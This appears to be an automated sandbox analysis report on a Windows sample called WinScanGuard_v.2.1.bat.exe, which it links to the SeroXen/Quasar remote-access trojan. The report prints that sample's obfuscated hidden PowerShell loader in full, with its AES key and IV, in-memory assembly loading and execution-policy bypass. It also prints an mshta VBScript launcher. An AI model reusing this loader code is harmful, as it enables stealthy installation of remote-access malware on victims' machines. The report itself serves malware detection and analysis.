              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net452\Microsoft.Win32.TaskScheduler.pdbSHA256 source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: cmd.pdb source: $sxr-cmd.exe, 00000010.00000000.1933753020.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe, 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe.2.dr
              Source: Binary string: mshta.pdb source: $sxr-mshta.exe, 0000000D.00000000.1920454183.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe, 0000000D.00000002.2918096738.00007FF7142F2000.00000002.00000001.01000000.00000008.sdmp, $sxr-mshta.exe.2.dr
              Source: Binary string: <Module>costura.metadatacostura.sharpdx.direct3d11.pdb.compressedcostura.costura.pdb.compressedcostura.sharpdx.dxgi.pdb.compressedcostura.sharpdx.pdb.compressedcostura.sharpdx.direct3d11.dll.compressedcostura.costura.dll.compressedcostura.sharpdx.dxgi.dll.compressedcostura.gma.system.mousekeyhook.dll.compressedcostura.system.runtime.interopservices.runtimeinformation.dll.compressedcostura.quasar.common.dll.compressedcostura.newtonsoft.json.dll.compressedcostura.bouncycastle.crypto.dll.compressedcostura.ionic.zip.dll.compressedcostura.microsoft.win32.taskscheduler.dll.compressedcostura.de.microsoft.win32.taskscheduler.resources.dll.compressedcostura.pl.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-cn.microsoft.win32.taskscheduler.resources.dll.compressedcostura.fr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.es.microsoft.win32.taskscheduler.resources.dll.compressedcostura.it.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-hant.microsoft.win32.taskscheduler.resources.dll.compressedcostura.ru.microsoft.win32.taskscheduler.resources.dll.compressedcostura.protobuf-net.dll.compressedcostura.sharpdx.dll.compressed4a731784-801d-481b-a36f-654a2936777eQuasar.Client.InstallStager.exeQuasar.Client.UninstallStager.exeQuasar.Client.ResetPatcher.binQuasar.Client.QuasarApplication.resourcesQuasar.Client.Properties.Resources.resourcesILRepack.List source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\C5\Documents\SeroXen Stuff\Quasar-master\Quasar-master-release\bin\Release\net452\REPOS\seroxen rootkit stuff\InstallStager\bin\Release\InstallStager.pdb source: $sxr-powershell.exe, 00000012.00000002.3104746555.000002853878B000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.sharpdx.dxgi.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PHZMpSLEzcFKaRUZszZmeOVApLd.exe, 00000025.00000000.2071708899.000000000059E000.00000002.00000001.01000000.0000000E.sdmp, PHZMpSLEzcFKaRUZszZmeOVApLd.exe, 00000027.00000000.2076760645.000000000059E000.00000002.00000001.01000000.0000000E.sdmp, PHZMpSLEzcFKaRUZszZmeOVApLd.exe, 0000002B.00000000.2087575742.000000000059E000.00000002.00000001.01000000.0000000E.sdmp
              Source: Binary string: cmd.pdbUGP source: $sxr-cmd.exe, 00000010.00000000.1933753020.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe, 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp, $sxr-cmd.exe.2.dr
              Source: Binary string: costura.sharpdx.direct3d11.pdb.compressed|||SharpDX.Direct3D11.pdb|A2259A45EA284247B3AA65EC9C1DBEBD47FE208F|78220 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: powershell.pdbUGP source: WinScanGuard_v.2.1.bat.exe, 00000002.00000000.1726165397.00007FF60EAAA000.00000002.00000001.01000000.00000003.sdmp, $sxr-powershell.exe.2.dr, WinScanGuard_v.2.1.bat.exe.0.dr
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net452\Microsoft.Win32.TaskScheduler.pdb source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: powershell.pdb source: WinScanGuard_v.2.1.bat.exe, 00000002.00000000.1726165397.00007FF60EAAA000.00000002.00000001.01000000.00000003.sdmp, $sxr-powershell.exe.2.dr, WinScanGuard_v.2.1.bat.exe.0.dr
              Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: )costura.sharpdx.direct3d11.pdb.compressed source: $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ura.costura.pdb.X source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: costura.costura.pdb.compressed8 source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exeUnpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2100000.2.unpack
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exeUnpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2270000.5.unpack
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exeUnpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2290000.6.unpack
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exeUnpacked PE file: 37.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2310000.8.unpack
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exeUnpacked PE file: 39.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2420000.4.unpack
              Source: C:\Program Files (x86)\WWvRtdUZZZirKKsEfpbPzrCIpjHkNCubfPaYwidQSHYMBQUEtxZljoDcrOQsfKtQSiG\PHZMpSLEzcFKaRUZszZmeOVApLd.exeUnpacked PE file: 39.2.PHZMpSLEzcFKaRUZszZmeOVApLd.exe.2440000.5.unpack
              Source: Yara matchFile source: 18.2.$sxr-powershell.exe.28538ad9110.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.$sxr-powershell.exe.28538ad9110.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.2138245203.0000020C8051D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2928056042.0000028528D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: WinScanGuard_v.2.1.bat.exe PID: 7128, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: $sxr-powershell.exe PID: 5088, type: MEMORYSTR
              Source: 18.2.$sxr-powershell.exe.28538f11f48.20.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
              Source: 18.2.$sxr-powershell.exe.28538f11f48.20.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
              Source: C:\Windows\$sxr-powershell.exeAnti Malware Scan Interface: Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.Ciphe
              Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqW
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5088).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXd
              Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqWJump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: C:\Windows\$sxr-powershell.exe "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5088).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdJump to behavior
              Source: unknownProcess created: C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00AAE870D push rcx; retf 003Fh13_2_000001A00AAE870E
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00BDC950D push rcx; retf 003Fh13_2_000001A00BDC950E
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B60870D push rcx; retf 003Fh16_2_0000020D0B60870E
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B63950D push rcx; retf 003Fh16_2_0000020D0B63950E
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_000002428789870D push rcx; retf 003Fh21_2_000002428789870E
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_00000242878C950D push rcx; retf 003Fh21_2_00000242878C950E
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_00007FFD9BB806C8 push edi; ret 21_2_00007FFD9BB806CA
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC62870D push rcx; retf 003Fh24_2_00000225DC62870E
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC65950D push rcx; retf 003Fh24_2_00000225DC65950E
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC68870D push rcx; retf 003Fh24_2_00000225DC68870E
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC70870D push rcx; retf 003Fh24_2_00000225DC70870E
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC76870D push rcx; retf 003Fh24_2_00000225DC76870E
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC7C870D push rcx; retf 003Fh24_2_00000225DC7C870E
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC82870D push rcx; retf 003Fh24_2_00000225DC82870E
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0AC870D push rcx; retf 003Fh25_2_00000202C0AC870E
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0AF950D push rcx; retf 003Fh25_2_00000202C0AF950E
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A6612E870D push rcx; retf 003Fh27_2_000002A6612E870E
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66131950D push rcx; retf 003Fh27_2_000002A66131950E
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66137950D push rcx; retf 003Fh27_2_000002A66137950E
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF1E870D push rcx; retf 003Fh30_2_000002BAAF1E870E
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF21870D push rcx; retf 003Fh30_2_000002BAAF21870E
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14C950D push rcx; retf 003Fh30_2_000002BAB14C950E
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14F870D push rcx; retf 003Fh30_2_000002BAB14F870E
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB155870D push rcx; retf 003Fh30_2_000002BAB155870E
